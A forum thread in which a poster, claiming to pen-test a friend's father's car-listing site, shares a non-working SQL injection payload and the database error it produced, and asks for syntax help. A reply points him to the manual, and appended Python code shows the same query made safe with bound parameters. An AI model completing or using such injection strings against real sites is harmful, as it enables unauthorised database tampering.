Don't bother reading. Shouldn't have even asked.
I'm new to MySQL. I'm pen-testing a site for a friend, and I just can't get the syntax right to view these listings that are supposed to be hidden. Anyone want to help? I've got:
WHERE dealer.display='on' AND hide != 'true'
AND dealer.id=listing.dealer_id
AND listing.make='/*begin injection*/'Acura'
AND TRUE=(INSERT INTO (listing,dealer) VALUES('v4LT0S34rChF0r'))
OR 'g'='r /*end injection*/ '
AND listing.model='anythinghere'
Okay, fine. The father of one of my friends. But w/e. I already showed him an XSS-able input form… I'm totally serious. Don't believe me if you don't want to, but help with the syntax please?
Also, updated code I'm trying.
Here's the output.
A Database Error Occurred
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near markup 'INTO (listing,dealer) VALUES('v4LT0S34rChF0r')) OR 'g'='r' AND listing.year >='1'
at line 3
SELECT listing.id, dealer.display FROM (listing,dealer) WHERE dealer.display='on' AND hide != 'true' AND dealer.id=listing.dealer_id AND listing.make='Acura' AND TRUE=(INSERT INTO (listing,dealer) VALUES('v4LT0S34rChF0r')) OR 'g'='r' AND listing.year >='1901' AND listing.mileage >=0
You could do what the error message suggests and read the MySQL manual. It even shows you where in the query the syntax error occurs, which you can use to figure out which statement to look up.
outis wrote: You could do what the error message suggests and read the MySQL manual. It even shows you where in the query the syntax error occurs, which you can use to figure out which statement to look up.
Yeah… I'm sorry for even posting this now. I'm going to bookmark that, and do all those steps before asking. Lesson learned! Thanks for your time!
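For anyone maintaining a search like the one in the error output above: an added example, not part of the thread and not the site's code, showing the same listing query with every user field bound as a parameter and with database errors replaced by a generic message instead of the full SQL text. It uses Python's sqlite3 as a stand-in for MySQL; the sample rows, the column types and placing `hide` on `listing` are assumptions.

```python
import sqlite3

# Constructed sample schema; column names come from the query in the error
# output above, their types and the table that owns `hide` are assumptions.
SCHEMA = """
CREATE TABLE dealer  (id INTEGER PRIMARY KEY, display TEXT);
CREATE TABLE listing (id INTEGER PRIMARY KEY, dealer_id INTEGER, make TEXT,
                      model TEXT, year INTEGER, mileage INTEGER, hide TEXT);
INSERT INTO dealer  VALUES (1, 'on'), (2, 'off');
INSERT INTO listing VALUES
  (10, 1, 'Acura', 'TL', 2005, 90000, 'false'),
  (11, 1, 'Acura', 'RL', 2007, 60000, 'true'),
  (12, 2, 'Acura', 'MDX', 2009, 40000, 'false');
"""

# Every user-supplied value is a bound parameter, so it can never change
# the shape of the statement, whatever characters it contains.
SEARCH = """
SELECT listing.id, dealer.display
FROM listing JOIN dealer ON dealer.id = listing.dealer_id
WHERE dealer.display = 'on' AND listing.hide != 'true'
  AND listing.make = ? AND listing.year >= ? AND listing.mileage >= ?
"""

def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def search(db, make, min_year=1901, min_mileage=0):
    """Return (rows, error). `error` is safe to show to the user as-is."""
    try:
        # Validate numeric fields before they reach the database.
        params = (str(make), int(min_year), int(min_mileage))
        return db.execute(SEARCH, params).fetchall(), None
    except (ValueError, sqlite3.Error):
        # Log details server-side; never echo the SQL text to the client.
        return [], "Search is unavailable right now."

if __name__ == "__main__":
    db = open_db()
    print(search(db, "Acura"))
    # The text from the post above, passed as the `make` field.
    posted = ("Acura' AND TRUE=(INSERT INTO (listing,dealer) "
              "VALUES('v4LT0S34rChF0r')) OR 'g'='r")
    print(search(db, posted))                     # compared as a plain string
    print(search(db, "Acura", min_year="abc"))    # generic error, no SQL shown
```

With binding, the posted text is compared against `listing.make` as an ordinary string, so it matches no rows and the tables are unchanged.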